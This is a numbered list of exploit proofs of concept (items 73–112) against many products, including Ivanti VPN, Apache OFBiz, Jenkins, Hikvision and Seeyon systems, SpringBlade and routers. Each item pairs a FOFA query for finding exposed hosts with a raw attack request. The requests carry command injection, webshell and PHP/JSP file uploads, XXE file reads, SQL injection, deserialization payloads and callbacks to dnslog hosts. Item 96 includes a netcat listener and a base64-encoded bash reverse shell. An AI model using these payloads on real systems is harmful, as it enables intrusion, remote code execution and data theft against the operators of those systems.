Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 mobile campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is below; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (Qi-Anxin) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen (奇安信网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
